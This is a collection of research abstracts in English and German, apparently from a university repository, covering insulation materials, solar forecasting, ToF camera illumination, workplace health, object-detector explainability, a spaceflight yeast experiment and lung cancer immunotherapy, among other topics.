Approximately 45% of global greenhouse gas emissions are caused by the construction and use of buildings. Thermal insulation of buildings in the current context of climate change is a well-known strategy to improve the energy efficiency of buildings. The development of renewable insulation material can overcome the drawbacks of widely used insulation systems based on polystyrene or mineral wool. This study analyzes the sustainability and thermal conductivity of new insulation materials made of Miscanthus x giganteus fibers, foaming agents, and alkali-activated fly ash binder. Life cycle assessments (LCA) are necessary to perform benchmarking of environmental impacts of new formulations of geopolymer-based insulation materials. The global warming potential (GWP) of the product is primarily determined by the main binder component sodium silicate. Sodium silicate's CO2 emissions depend on local production, transportation, and energy consumption. The results, which have been published during recent years, vary in a wide range from 0.3 kg to 3.3 kg CO2-eq. kg-1. The overall GWP of the insulation system based on Miscanthus fibers, with properties according to current thermal insulation regulations, reaches up to 95% savings of CO2 emissions compared to conventional systems. Carbon neutrality can be achieved through formulations containing raw materials with carbon dioxide emissions and renewable materials with negative GWP, thus balancing CO2 emissions.
In her recent article, Bender discusses several aspects of research–practice–collaborations (RPCs). In this commentary, we apply Bender's arguments to experiences in engineering research and development (R&D). We investigate the influence of interaction with practice partners on relevance, credibility, and legitimacy in the special engineering field of product development and analyze which methodological approaches are already being pursued for dealing with diverging interests and asymmetries and which steps will be necessary to include interests of civil society beyond traditional customer relations.
Due to the COVID-19 pandemic, health education programs and workplace health promotion (WHP) could only be offered under difficult conditions, if at all. In Germany for example, mandatory lockdowns, working from home, and physical distancing have led to a sharp decline in expenditure on prevention and health promotion from 2019 to 2020. At the same time, the pandemic has negatively affected many people’s mental health. Therefore, our goal was to examine audiovisual stimulation as a possible measure in the context of WHP, because its usage is contact-free, time flexible, and offers, additionally, voice-guided health education programs. In an online survey following a cross-sectional single case study design with 393 study participants, we examined the associations between audiovisual stimulation and mental health, work engagement, and burnout. Using multiple regression analyses, we could identify positive associations between audiovisual stimulation and mental health, burnout, and work engagement. However, longitudinal data are needed to further investigate causal mechanisms between mental health and the use of audiovisual stimulation. Nevertheless, especially with regard to the pandemic, audiovisual stimulation may represent a promising measure for improving mental health at the workplace.
Die Medikalisierungs- und die Kompressionsthese sind zwei „konkurrierende“ Ansätze in Bezug auf die Frage, in welchem Gesundheitszustand ein längeres Leben, insbesondere die Lebensjahre in höherem Alter verbracht werden. Neben der individuellen Bedeutung von Quantität und Qualität der Lebensjahre ist die Relevanz dieser Frage für das Gesundheitswesen hoch, denn nicht nur in der Vergangenheit ist die Zahl bzw. auch der Anteil der älteren Menschen gestiegen, es wird im Kontext des demografischen Wandels ein weiterer Anstieg, auch der Lebenserwartung, prognostiziert – und die Auswirkungen auf die Versorgungsbedarfe bzw. Ausgaben im Gesundheitswesen können beträchtlich sein.
Die vorliegende Arbeit befasst sich mit der Entwicklung eines Schaltungskonzepts und Labormusters einer externen Beleuchtung für den Einsatz in der Forschung an Time-of-Flight (ToF) Kameras mit Amplitude-Modulated Continuous Wave (AMCW)-Verfahren. Die externe Beleuchtung stellt einen leistungsstarken Repeater der internen Beleuchtung einer ToF Kamera dar und ist in der Lage die von ToF Kameras genutzten hochfrequenten Rechtecksignale zu emittieren.
Da von ToF Kameras in der Regel kein elektrisches Steuersignal (Triggersignal) für den Einsatz einer externen Beleuchtung zur Verfügung gestellt wird, wird dieses aus dem optischen Signal der ToF Kamera gewonnen. Dafür wird ein Konzept für einen optischen Detektor (Trigger) vorgestellt. Dieser setzt sich aus einer Photodiode, einem Transimpedanzverstärker und einer anschließenden Signalaufbereitung zusammen. Außerdem wird gezeigt, wie eine schnelle externe Beleuchtung mit hoher Strahlungsleistung mithilfe eines Metal-Oxid-Semiconductor Field-Effekt-Transistor (MOSFET) und vier Vertical-Cavitiy Surface-Emitting Laser (VCSEL) umgesetzt werden kann. Dafür werden mit der Serien- und Parallelschaltung von MOSFET und VCSEL zwei Schaltungskonzepte vorgestellt. Als Lichtquellen kommen VCSEL mit einer für ToF Kameras typischen Wellenlänge von 940 nm im Nahinfraroten (NIR) zum Einsatz.
Es konnte gezeigt werden, dass mit dem optischen Trigger Signale von bis zu 100 MHz in elektrische Ausgangssignale gewandelt werden können. Außerdem wurden rechteckige Triggersignale mit Anstiegszeiten von 650 ps und Abfallzeiten von 440 ps erzielt. Mit der externen Beleuchtung konnten Signale mit bis zu 100 MHz emittiert werden. Es wurden im Zusammenspiel mit dem optischen Trigger optische Signale mit Anstiegszeiten von 1,5 ns und Abfallzeiten von 960 ps erreicht. Dabei konnten Strahlungsleistungen von knapp 7 W erzielt werden. Das gesamte System aus optischem Trigger und externer Beleuchtung weist eine Latenz von 16 ns auf. Als Ergebnis dieser Arbeit konnte ein System aufgebaut werden, das aufgrund der erzielten Ergebnisse höchstwahrscheinlich als externe Beleuchtung zu Forschungszwecken mit verschiedenen ToF Kameras eingesetzt werden kann. Außerdem besteht die Möglichkeit den optischen Trigger und die Beleuchtung separat zu nutzen.
This paper explores the role of artificial intelligence (AI) in elite sports. We approach the topic from two perspectives. Firstly, we provide a literature based overview of AI success stories in areas other than sports. We identified multiple approaches in the area of Machine Perception, Machine Learning and Modeling, Planning and Optimization as well as Interaction and Intervention, holding a potential for improving training and competition. Secondly, we discover the present status of AI use in elite sports. Therefore, in addition to another literature review, we interviewed leading sports scientist, which are closely connected to the main national service institute for elite sports in their countries. The analysis of this literature review and the interviews show that the most activity is carried out in the methodical categories of signal and image processing. However, projects in the field of modeling & planning have become increasingly popular within the last years. Based on these two perspectives, we extract deficits, issues and opportunities and summarize them in six key challenges faced by the sports analytics community. These challenges include data collection, controllability of an AI by the practitioners and explainability of AI results.
Seit Sokrates bildet die Frage „Was macht ein glückliches Leben aus?“ den Ausgangspunkt der Entwicklung einer Vielfalt von Wohlbefindenstheorien. Den Kern dieses Aufsatzes bildet die Erörterung der Fragen, inwieweit das Konzept der empirischen Lebenszufriedenheit und die dadurch gewonnenen Korrelate einen Beitrag zur Beantwortung dieser Frage leisten und ob diese Antworten eine Wohlbefindenstheorie begründen können, welche die philosophische Theorie mit empirischen Ergebnissen verknüpft.
Im Zentrum dieses Aufsatzes steht eine Diskussion der wichtigsten Wohlbefindenstheorien, ihrer Qualitäten, Gemeinsamkeiten und Unterschiede. Einen Schwerpunkt bildet die Theorie der subjektiven Lebenszufriedenheit. Ich diskutiere Stärken und Schwächen des Konzeptes und stelle die wichtigsten Ergebnisse der empirischen Lebenszufriedenheitsforschung in einem Überblick dar.
Im Ergebnis argumentiere ich, dass die Resultate der empirischen Forschung als Grundlage einer subjektiv-objektiven Wohlbefindenstheorie dienen können. Qualitativ hochwertige zwischenmenschliche Beziehungen, ein gesunder Lebensstil, eine ausgewogene Work-Life-Balance, der Einsatz für Andere, das Verfolgen von Lebenszielen und persönlichen Interessen bilden die Grundlage einer Wohlbefindenstheorie, die sich auf empirische Lebenszufriedenheitsforschung stützt.
Im Zuge der Migrationsbewegung in den Jahren 2015 und 2016 hat die menschenwürdige Unterbringung von geflüchteten Menschen in Kommunen in Deutschland an Aufmerksamkeit gewonnen. Der Anstieg der Asylbewerber:innen in den Kommunen sowie die Bundesinitiative „Schutz von geflüchteten Menschen in Flüchtlingsunterkünften“ haben Veränderungen im Hinblick auf Schutzstandards in der kommunalen Unterbringung geflüchteter Menschen hervorgerufen. Der Artikel erklärt diese Veränderungen mittels einer akteurszentrierten organisationssoziologischen Herangehensweise. Grundlage sind empirische Forschungsergebnisse des Projektes „Organisational Perspectives on Human Security Standards for Refugees in Germany“ aus zwei deutschen Kommunen.
The non-scientific questioning of scientific research during the COVID-19 pandemic, the unwillingness of a president of the United States of America to accept the result of a democratically held election: just in recent times, there have been quite a few striking examples of long-held certainties appearing as nothing more than just illusions. This essay reflects on the severe consequences of the loss of such certainties in the spheres of democratic politics on the one hand and of science, especially for highly differentiated societies, on the other hand as well as on their interdependencies. Furthermore, the author tries to make the case that this disillusionment could prove to be a salutary shock – reminding us that we need to take a stand for the things we hold as certainties, oftentimes even as calming ones, if we want them to stay how we always thought they were.
The backdated research dedicated to digital entrepreneurship education is immense, which makes it difficult to create an overview. Conversely, forward-thinking bibliometric visualization mapping and clustering can assist in visualizing and structuring difficult research literature. Hence, the goal of this mapping visualization study is to thoroughly discover and create clusters of EE to convey a taxonomic structure that can oblige as a basis for upcoming research. The analyzed data, which is drawn from Google Scholar through Publish or Perish tool, contain 1000 documents published between 2007 and 2022. This taxonomy should generate stronger bonds with digital entrepreneurial education research; on the other, it should stand in international research association to boost both interdisciplinary digital entrepreneurial education and its influence on a universal basis. This work strengthens student’s understanding of current digital entrepreneurial education research by classifying and decontaminating the most powerful knowledgeable relationship among its contributions and contributors. The bibliographic analysis includes ‘citation network’, ‘author’s research area’ and ‘paper content’ regarding the desired topic. In this paper, the above three mentioned terms are integrated which produces a bibliographic model of authors, titles of their papers, keywords and abstract by using Harzing’s Publish or Perish tool for extracting data from Google Scholar and further using VOSViewer to visualize networking map of co-authorship and term co-occurrence to administer the data for an instinctive and appropriate understanding of university students concerning ‘digital entrepreneurial intention’ research. This paper uses bibliometric analysis to analyze the keyword co-occurrence and co-authorship and VOSViewer is used for visualization.
Research-Practice-Collaborations Addressing One Health and Urban Transformation. A Case Study
(2022)
One Health is an integrative approach at the interface of humans, animals and the environment, which can be implemented as Research-Practice-Collaboration (RPC) for its interdisciplinarity and intersectoral focus on the co-production of knowledge. To exemplify this, the present commentary shows the example of the Forschungskolleg “One Health and Urban Transformation” funded by the Ministry of Culture and Science of the State Government of Nord Rhine Westphalia in Germany. After analysis, the factors identified for a better implementation of RPC for One Health were the ones that allowed for constant communication and the reduction of power asymmetries between practitioners and academics in the co-production of knowledge. In this light, the training of a new generation of scientists at the boundaries of different disciplines that have mediation skills between academia and practice is an important contribution with great implications for societal change that can aid the further development of RPC.
The cooperation between researchers and practitioners during the different stages of the research process is promoted as it can be of benefit to both society and research supporting processes of ‘transformation’. While acknowledging the important potential of research–practice–collaborations (RPCs), this paper reflects on RPCs from a political-economic perspective to also address potential unintended adverse effects on knowledge generation due to divergent interests, incomplete information or the unequal distribution of resources. Asymmetries between actors may induce distorted and biased knowledge and even help produce or exacerbate existing inequalities. Potential merits and limitations of RPCs, therefore, need to be gauged. Taking RPCs seriously requires paying attention to these possible tensions—both in general and with respect to international development research, in particular: On the one hand, there are attempts to contribute to societal change and ethical concerns of equity at the heart of international development research, and on the other hand, there is the relative risk of encountering asymmetries more likely.
Flüssigkeit, die in Werbespots symbolisch für Menstruationsblut steht, war jahrzehntelang blau, erst im September 2021 zeigte ein Hersteller erstmalig eine Flüssigkeit, welche realitätsnah in der Farbe Rot dargestellt wurde (1). Hygieneartikel, die Menstruierende zwingend benötigen, sind in Deutschland mit wenigen Ausnahmen auf öffentlichen Toiletten nicht verfügbar: Das Nicht-Sichtbarsein offenbarte auch im Jahr 2021 das Tabu um natürliche biologische Prozesse des weiblichen Körpers. Scham und Einschränkungen, die sich verhindern ließen, sind die Folge. Menstruierende werden in ihrem Wohlbefinden limitiert, und negative Erlebnisse führen dazu, dass Betroffene in der Ausübung von sozialen, schulischen und beruflichen Aktivitäten nicht nur durch die Menstruation selbst, sondern auch durch Normen und Erziehungsmuster beeinträchtigt sind, wie zahlreiche internationale Studien gezeigt haben (2). Für den deutschen Hochschulkontext fehlen solche Studien bislang.
The electricity grid of the future will be built on renewable energy sources, which are highly variable and dependent on atmospheric conditions. In power grids with an increasingly high penetration of solar photovoltaics (PV), an accurate knowledge of the incoming solar irradiance is indispensable for grid operation and planning, and reliable irradiance forecasts are thus invaluable for energy system operators. In order to better characterise shortwave solar radiation in time and space, data from PV systems themselves can be used, since the measured power provides information about both irradiance and the optical properties of the atmosphere, in particular the cloud optical depth (COD). Indeed, in the European context with highly variable cloud cover, the cloud fraction and COD are important parameters in determining the irradiance, whereas aerosol effects are only of secondary importance.
Intention: Within the research project EnerSHelF (Energy-Self-Sufficiency for Health Facilities in Ghana), i. a. energy-meteorological and load-related measurement data are collected, for which an overview of the availability is to be presented on a poster.
Context: In Ghana, the total electricity consumed has almost doubled between 2008 and 2018 according to the Energy Commission of Ghana. This goes along with an unstable power grid, resulting in power outages whenever electricity consumption peaks. The blackouts called "dumsor" in Ghana, pose a severe burden to the healthcare sector. Innovative solutions are needed to reduce greenhouse gas emissions and improve energy and health access.
West Africa has great potential for the use of solar energy systems, as it has both a high solar radiation rate and a lack of energy production. West Africa is a very aerosol-rich region, whose effects on photovoltaic (PV) use are due to both atmospheric conditions and existing solar technology. This study reports the variability of aerosol optical properties in the city of Koforidua, Ghana over the period 2016 to 2020, and their impact on the radiation intensity and efficiency of a PV cell. The study used AERONET ground (Giles et al., 2019) and satellite data produced by CAMS (Gschwind, et al., 2019), which both provide aerosol optical depth (AOD) and metrological parameters used for radiative transfer calculations with libRadtran (Emde, et al., 2016). A spectrally resolved PV model (Herman-Czezuch et al., 2022) is then used to calculate the PV yield of two PV technologies: polycrystalline and amorphous silicon. It is observed that for both data sets, the aerosol is mainly composed of dust and organic matter, with a very increased AOD load during the harmattan period (December-February), also due to the fires observed during this period.
Die Digitalisierung und der Einsatz von Informations- und Kommunikationstechnologien (ICT) hat im Arbeits- und Privatleben neben einer höheren Produktivität auch zu neuen Formen von psychischem Stress geführt. Das Stresserleben, das mit dem Einsatz von ICT verbunden ist, wird in der Literatur auch als Technostress bezeichnet. Die Forschung zu diesem Thema zeigt, dass die Entstehung von Technostress von individuellen Faktoren abhängt. Die Persönlichkeit von ICT-Anwenderinnen und Anwendern bestimmt nicht nur das Auftreten von Technostress, sondern hat auch Einfluss auf dessen gesundheitliche und leistungsbezogene Folgen. In diesem Literaturreview wird der Forschungsstand zu der Rolle von Persönlichkeitsunterschieden bei der Entstehung von Technostress und dessen Folgen systematisch zusammengefasst. Die Auswertung der relevanten Forschungsartikel erfolgt hinsichtlich verwendeter Variablen, Stichproben und Studiendesigns, statistischer Methoden, Theorien und Frameworks. Abschließend werden der aktuelle Forschungsstand eingeordnet und Forschungslücken aufgezeigt.
Der Befall mit schädlichen Pilzen führt im Weinbau zu Ertragseinbusen sowie zu ökonomischen und ökologischen Belastungen durch den präventiven Einsatz von Fungiziden. Diese könnten durch eine Früherkennung des Befalls verringert werden. Das Projekt vinoLAS® soll die kontaktlose Früherkennung des falschen Mehltaus, einer wichtigen schädlichen Pilzart im Weinbau, ermöglichen. Dabei sollen Methoden der laserinduzierten Fluoreszenzspektroskopie verwendet werden. In dieser Arbeit wird ein Detektionsmodul zur Analyse des laserinduziertem Fluoreszenzlichts in vier spektralen Kanälen entwickelt.
Die Anforderungen an das Detektionsmodul werden festgelegt und die Entwicklung erläutert. Das System lässt sich in einen optischen und elektronischen Aufbau teilen. Das Verhalten des elektronische Aufbaus wird anhand umfangreicher Messungen bestimmt und mit den Anforderungen verglichen. Es wird mit dem optischen Aufbau zu einem Gesamtsystem kombiniert. Mit diesem werden Messungen im vinoLAS® Laboraufbau durchgeführt, welche zur Verifikation mit einer Referenzmessung verglichen werden.
Die Messungen zum elektronischen Aufbau zeigen, dass alle gestellten Anforderungen erfüllt und teilweise übertroffen werden. Das entstandene Gated-Integrator System ist mit einem, deutlich teureren, kommerziellen Gated-Integrator vergleichbar, bietet dabei aber doppelt so viele Kanäle und ein 44% geringeres Rauschen. Mit der Diskussion der Messdaten werden außerdem Ansätze vorgestellt, die eine kostengünstige weiter Verbesserung des elektronischen Systems ermöglichen.
Die Messungen mit dem Gesamtsystem zeigen eine qualitative Übereinstimmung mit der Referenzmessung, es sind jedoch noch quantitative Abweichungen vorhanden, die weiter untersucht werden müssen. Außerdem zeigt sich, dass die Qualität der Messdaten durch eine Schwankung der Laserfrequenz stark eingeschränkt wird. Eine leicht implementierbare und kostengünstige Lösung für dieses Problem wird jedoch vorgestellt.
Nach Umsetzung der beiden Verbesserungsvorschläge kann das System in den vinoLAS® Aufbau integriert werden und so eine kontaktlose Früherkennung von falschem Mehltau in Weinreben ermöglichen.
The aim of this paper is to assess the objectives of farmers’ challenges in enhancing biodiversity. The so-called “trilemma” (WBGU 2021) of land use stems from the multiple demands made on land for the benefit of mitigating climate change, securing food and maintaining biodiversity. The agricultural sector is accused of maladministration: it is blamed for causing soil contamination, animal cruelty, bee mortality and climate change. That is why farmers are seen as key actors at all levels. They are, however, also key players when it comes to overcoming the problems of the future. Their supportive role is urgently needed, but farmers find themselves caught between a “rock” and a ”hard place”. Consumers are calling for sustainable, environmentally friendly production and inexpensive food products that do not contain pesticide residues, demanding enough food for all. Farmers are restricted by the wants and needs of consumers who are influenced by interest groups and are exposed to direct and indirect influencing factors and their interdependencies. They are also tasked with balancing the scrutiny of the critical public on the one hand, and the control exercised by eager authorities on the other.
As part of the DINA (Diversity of Insects in Nature protected Areas) project, a trans- and interdisciplinary research study, we collected and surveyed the data of farmers who are farming within or close to the 21 selected nature protected areas included in the DINA project. Data was collected as part of a mixed method approach using a semi-structured questionnaire. The methodological and strategic approach and interdependencies of issues demonstrate the complexity of today’s problems. To investigate this, we first used the data collection method using questionnaires with closed and open questions. The conflicts and obstacles farmers face were evaluated, and the results show farmers’ willingness and the importance of appreciation shown to farmers for implementation of biodiversity measures. The paper proposes some follow-up activities (quantitative study) to verify the objectives. The results will later lead to recommendations for policymakers and farmers in all German nature protected areas.
The accurate forecasting of solar radiation plays an important role for predictive control applications for energy systems with a high share of photovoltaic (PV) energy. Especially off-grid microgrid applications using predictive control applications can benefit from forecasts with a high temporal resolution to address sudden fluctuations of PV-power. However, cloud formation processes and movements are subject to ongoing research. For now-casting applications, all-sky-imagers (ASI) are used to offer an appropriate forecasting for aforementioned application. Recent research aims to achieve these forecasts via deep learning approaches, either as an image segmentation task to generate a DNI forecast through a cloud vectoring approach to translate the DNI to a GHI with ground-based measurement (Fabel et al., 2022; Nouri et al., 2021), or as an end-to-end regression task to generate a GHI forecast directly from the images (Paletta et al., 2021; Yang et al., 2021). While end-to-end regression might be the more attractive approach for off-grid scenarios, literature reports increased performance compared to smart-persistence but do not show satisfactory forecasting patterns (Paletta et al., 2021). This work takes a step back and investigates the possibility to translate ASI-images to current GHI to deploy the neural network as a feature extractor. An ImageNet pre-trained deep learning model is used to achieve such translation on an openly available dataset by the University of California San Diego (Pedro et al., 2019). The images and measurements were collected in Folsom, California. Results show that the neural network can successfully translate ASI-images to GHI for a variety of cloud situations without the need of any external variables. Extending the neural network to a forecasting task also shows promising forecasting patterns, which shows that the neural network extracts both temporal and momentarily features within the images to generate GHI forecasts.
Microarray-based experiments revealed that thyroid hormone triiodothyronine (T3) enhanced the binding of Cy5-labeled ATP on heat shock protein 90 (Hsp90). By molecular docking experiments with T3 on Hsp90, we identified a T3 binding site (TBS) near the ATP binding site on Hsp90. A synthetic peptide encoding HHHHHHRIKEIVKKHSQFIGYPITLFVEKE derived from the TBS on Hsp90 showed, in MST experiments, the binding of T3 at an EC50 of 50 μM. The binding motif can influence the activity of Hsp90 by hindering ATP accessibility or the release of ADP.
When the Artemis missions launch, NASA's Orion spacecraft (and crew as of the Artemis II mission) will be exposed to the deep space radiation environment beyond the protection of Earth's magnetosphere. Hence, it is essential to characterize the effects of space radiation, microgravity, and the combination thereof on cells and organisms, i.e., to quantify any correlations between the deep space radiation environment, genetic variation, and induced genetic changes in cells. To address this, the Artemis I mission will include the Peristaltic Laboratory for Automated Science with Multigenerations (PLASM) hardware containing the Deep Space Radiation Genomics (DSRG) experiment. The scientific aims of DSRG are (i) to identify the metabolic and genomic pathways in yeast affected by microgravity, space radiation, and their combination, and (ii) to differentiate between gravity and radiation exposure on single-gene deletion/overexpressing strains' ability to thrive in the spaceflight environment. Yeast is used as a model system because 70% of its essential genes have a human homolog, and over half of these homologs can functionally replace their human counterpart. As part of the experiment preparation towards spaceflight, an Experiment Verification Test (EVT) was performed at the Kennedy Space Center to verify that the experiment design, hardware, and approach to automated operations will enable achieving the scientific aims. For the EVT, fluidic systems were assembled, sterilized, loaded, and acceptance-tested, and subsequently integrated with the engineering parts to produce a flight-like PLASM unit. Each fluidic system consisted of (i) a Media Bag, (ii) four Culture Bags loaded with Saccharomyces cerevisiae (two with deletion series and the remaining two with overexpression series), and (iii) tubing and check valves. The EVT PLASM unit was put under a temperature profile replicating the anticipated different phases of flight, including handover to launch, spaceflight, and splashdown to handover back to the science team, for a 58-day period. At EVT completion, the rate of activation, cellular growth, RNA integrity, and sample contamination were interrogated. All of the experiment's success criteria were satisfied, encouraging our efforts to perform this investigation on Artemis I. This manuscript thus describes the process of spaceflight experiment design maturation with a focus on the EVT, its results, DSRG's preparation for its planned launch on Artemis I in 2022, and how the PLASM hardware can enable other scientific goals on future Artemis missions and/or the Lunar Orbital Platform – Gateway.
Modern PCR-based analytical techniques have reached sensitivity levels that allow for obtaining complete forensic DNA profiles from even tiny traces containing genomic DNA amounts as small as 125 pg. Yet these techniques have reached their limits when it comes to the analysis of traces such as fingerprints or single cells. One suggestion to overcome these limits has been the usage of whole genome amplification (WGA) methods. These methods aim at increasing the copy number of genomic DNA and by this means generate more template DNA for subsequent analyses. Their application in forensic contexts has so far remained mostly an academic exercise, and results have not shown significant improvements and even have raised additional analytical problems. Until very recently, based on these disappointments, the forensic application of WGA seems to have largely been abandoned. In the meantime, however, novel improved methods are pointing towards a perspective for WGA in specific forensic applications. This review article tries to summarize current knowledge about WGA in forensics and suggests the forensic analysis of single-donor bioparticles and of single cells as promising applications.
Nanomedicine strategies were first adapted and successfully translated to clinical application for diseases, such as cancer and diabetes. These strategies would no doubt benefit unmet diseases needs as in the case of leishmaniasis. The latter causes skin sores in the cutaneous form and affects internal organs in the visceral form. Treatment of cutaneous leishmaniasis (CL) aims at accelerating wound healing, reducing scarring and cosmetic morbidity, preventing parasite transmission and relapse. Unfortunately, available treatments show only suboptimal effectiveness and none of them were designed specifically for this disease condition. Tissue regeneration using nano-based devices coupled with drug delivery are currently being used in clinic to address diabetic wounds. Thus, in this review, we analyse the current treatment options and attempt to critically analyse the use of nanomedicine-based strategies to address CL wounds in view of achieving scarless wound healing, targeting secondary bacterial infection and lowering drug toxicity.
Education for Sustainable Development (ESD, SDG 4) and human well-being (SDG 3) are among the central subjects of the Sustainable Development Goals (SDGs). In this article, based on the Questionnaire for Eudaimonic Well-Being (QEWB), we investigate to what extent (a) there is a connection between EWB and practical commitment to the SDGs and whether (b) there is a deficit in EWB among young people in general. We also want to use the article to draw attention to the need for further research on the links between human well-being and commitment for sustainable development. A total of 114 students between the ages of 18 and 34, who are either engaged in (extra)curricular activities of sustainable development (28 students) or not (86 students), completed the QEWB. The students were interviewed twice: once regarding their current and their aspired EWB. Our results show that students who are actively engaged in activities for sustainable development report a higher EWB than non-active students. Furthermore, we show that students generally report deficits in EWB and wish for an improvement in their well-being. This especially applies to aspects of EWB related to self-discovery and the sense of meaning in life. Our study suggests that a practice-oriented ESD in particular can have a positive effect on the quality of life of young students and can support them in working on deficits in EWB.
Vor dem Hintergrund der Covid-19-Pandemie hat sich das Home-Office in Deutschland seit dem Jahr 2020 weit verbreitet und wird seitdem bei vielen Arbeitgebern als neue Arbeitsmethode genutzt. Der Einsatz von Home-Office kann verschiedene positive als auch negative Effekte auf die Beschäftigten und den Arbeitgeber sowie die Gesellschaft allgemein haben. Damit von möglichst vielen positiven Effekten profitiert werden kann, ist ein gutes Home-Office Konzept erforderlich. Welche Anforderungen an ein solches Konzept bestehen und welche Voraussetzungen grundlegend mit der Nutzung von Home-Office verbunden sind, wird in dem Beitrag aufgezeigt. Dabei werden von technischen bis hin zu sozialen Aspekten Anforderungen verschiedener Arten berücksichtigt, welche durch eine durch den Autor durchgeführte Studie gebildet worden sind. Im Fokus dieses Beitrages sollen die kritischen Erfolgsfaktoren für das ideale Arbeiten im Home-Office stehen, also die Anforderungen, welche ausschlaggebend für die erfolgreiche Umsetzung eines Home-Office Konzeptes sind und Einfluss auf die wahrgenommenen Effekte des Home-Office haben. Die im Beitrag aufgeführte Studie des Autors wurde im Rahmen der Abschlussarbeit von Herrn Jeske durchgeführt, auf welcher der Beitrag basiert.
Novel methods for contingency analysis of gas transport networks are presented. They are motivated by the transition of our energy system where hydrogen plays a growing role. The novel methods are based on a specific method for topological reduction and so-called supernodes. Stationary Euler equations with advanced compressor thermodynamics and a gas law allowing for gas compositions with up to 100% hydrogen are used. Several measures and plots support an intuitive comparison and analysis of the results. In particular, it is shown that the newly developed methods can estimate locations and magnitudes of additional capacities (injection, buffering, storage etc.) with a reasonable performance for networks of relevant composition and size.
Comparative study of 3D object detection frameworks based on LiDAR data and sensor fusion techniques
(2022)
Estimating and understanding the surroundings of the vehicle precisely forms the basic and crucial step for the autonomous vehicle. The perception system plays a significant role in providing an accurate interpretation of a vehicle's environment in real-time. Generally, the perception system involves various subsystems such as localization, obstacle (static and dynamic) detection, and avoidance, mapping systems, and others. For perceiving the environment, these vehicles will be equipped with various exteroceptive (both passive and active) sensors in particular cameras, Radars, LiDARs, and others. These systems are equipped with deep learning techniques that transform the huge amount of data from the sensors into semantic information on which the object detection and localization tasks are performed. For numerous driving tasks, to provide accurate results, the location and depth information of a particular object is necessary. 3D object detection methods, by utilizing the additional pose data from the sensors such as LiDARs, stereo cameras, provides information on the size and location of the object. Based on recent research, 3D object detection frameworks performing object detection and localization on LiDAR data and sensor fusion techniques show significant improvement in their performance. In this work, a comparative study of the effect of using LiDAR data for object detection frameworks and the performance improvement seen by using sensor fusion techniques are performed. Along with discussing various state-of-the-art methods in both the cases, performing experimental analysis, and providing future research directions.
As cameras are ubiquitous in autonomous systems, object detection is a crucial task. Object detectors are widely used in applications such as autonomous driving, healthcare, and robotics. Given an image, an object detector outputs both the bounding box coordinates as well as classification probabilities for each object detected. The state-of-the-art detectors are treated as black boxes due to their highly non-linear internal computations. Even with unprecedented advancements in detector performance, the inability to explain how their outputs are generated limits their use in safety-critical applications in particular. It is therefore crucial to explain the reason behind each detector decision in order to gain user trust, enhance detector performance, and analyze their failure.
Previous work fails to explain as well as evaluate both bounding box and classification decisions individually for various detectors. Moreover, no tools explain each detector decision, evaluate the explanations, and also identify the reasons for detector failures. This restricts the flexibility to analyze detectors. The main contribution presented here is an open-source Detector Explanation Toolkit (DExT). It is used to explain the detector decisions, evaluate the explanations, and analyze detector errors. The detector decisions are explained visually by highlighting the image pixels that most influence a particular decision. The toolkit implements the proposed approach to generate a holistic explanation for all detector decisions using certain gradient-based explanation methods. To the author’s knowledge, this is the first work to conduct extensive qualitative and novel quantitative evaluations of different explanation methods across various detectors. The qualitative evaluation incorporates a visual analysis of the explanations carried out by the author as well as a human-centric evaluation. The human-centric evaluation includes a user study to understand user trust in the explanations generated across various explanation methods for different detectors. Four multi-object visualization methods are provided to merge the explanations of multiple objects detected in an image as well as the corresponding detector outputs in a single image. Finally, DExT implements the procedure to analyze detector failures using the formulated approach.
The visual analysis illustrates that the ability to explain a model is more dependent on the model itself than the actual ability of the explanation method. In addition, the explanations are affected by the object explained, the decision explained, detector architecture, training data labels, and model parameters. The results of the quantitative evaluation show that the Single Shot MultiBox Detector (SSD) is more faithfully explained compared to other detectors regardless of the explanation methods. In addition, a single explanation method cannot generate more faithful explanations than other methods for both the bounding box and the classification decision across different detectors. Both the quantitative and human-centric evaluations identify that SmoothGrad with Guided Backpropagation (GBP) provides more trustworthy explanations among selected methods across all detectors. Finally, a convex polygon-based multi-object visualization method provides more human-understandable visualization than other methods.
The author expects that DExT will motivate practitioners to evaluate object detectors from the interpretability perspective by explaining both bounding box and classification decisions.
Discrimination of Stressed and Non-Stressed Food-Related Bacteria Using Raman-Microspectroscopy
(2022)
As the identification of microorganisms becomes more significant in industry, so does the utilization of microspectroscopy and the development of effective chemometric models for data analysis and classification. Since only microorganisms cultivated under laboratory conditions can be identified, but they are exposed to a variety of stress factors, such as temperature differences, there is a demand for a method that can take these stress factors and the associated reactions of the bacteria into account. Therefore, bacterial stress reactions to lifetime conditions (regular treatment, 25 °C, HCl, 2-propanol, NaOH) and sampling conditions (cold sampling, desiccation, heat drying) were induced to explore the effects on Raman spectra in order to improve the chemometric models. As a result, in this study nine food-relevant bacteria were exposed to seven stress conditions in addition to routine cultivation as a control. Spectral alterations in lipids, polysaccharides, nucleic acids, and proteins were observed when compared to normal growth circumstances without stresses. Regardless of the involvement of several stress factors and storage times, a model for differentiating the analyzed microorganisms from genus down to strain level was developed. Classification of the independent training dataset at genus and species level for Escherichia coli and at strain level for the other food relevant microorganisms showed a classification rate of 97.6%.
The design of a fully superconducting wind power generator is influenced by several factors. Among them, a low number of pole pairs is desirable to achieve low AC losses in the superconducting stator winding, which greatly influences the cooling system design and, consecutively, the efficiency of the entire wind power plant. However, it has been identified that a low number of pole pairs in a superconducting generator tends to greatly increase its output voltage, which in turn creates challenging conditions for the necessary power electronic converter. This study highlights the interdependencies between the design of a fully superconducting 10 MW wind power generator and the corresponding design of its power electronic converter.
Background: Cancer heterogeneity poses a serious challenge concerning the toxicity and adverse effects of therapeutic inhibitors, especially when it comes to combinatorial therapies that involve multiple targeted inhibitors. In particular, in non-small cell lung cancer (NSCLC), a number of studies have reported synergistic effects of drug combinations in the preclinical models, while they were only partially successful in the clinical setup, suggesting those alternative clinical strategies (with genetic background and immune response) should be considered. Herein, we investigated the antitumor effect
of cytokine-induced killer (CIK) cells in combination with ALK and PD-1 inhibitors in vitro on genetically variable NSCLC cell lines.
Methods: We co-cultured the three genetically different NSCLC cell lines NCI-H2228 (EML4-ALK), A549 (KRAS mutation), and HCC-78 (ROS1 rearrangement) with and without nivolumab (PD-1 inhibitor) and crizotinib (ALK inhibitor). Additionally, we profiled the variability of surface expression multiple immune checkpoints, the concentration of absolute dead cells, intracellular granzyme B on CIK cells using flow cytometry as well as RT-qPCR. ELISA and Western blot were performed to verify the activation of CIK cells.
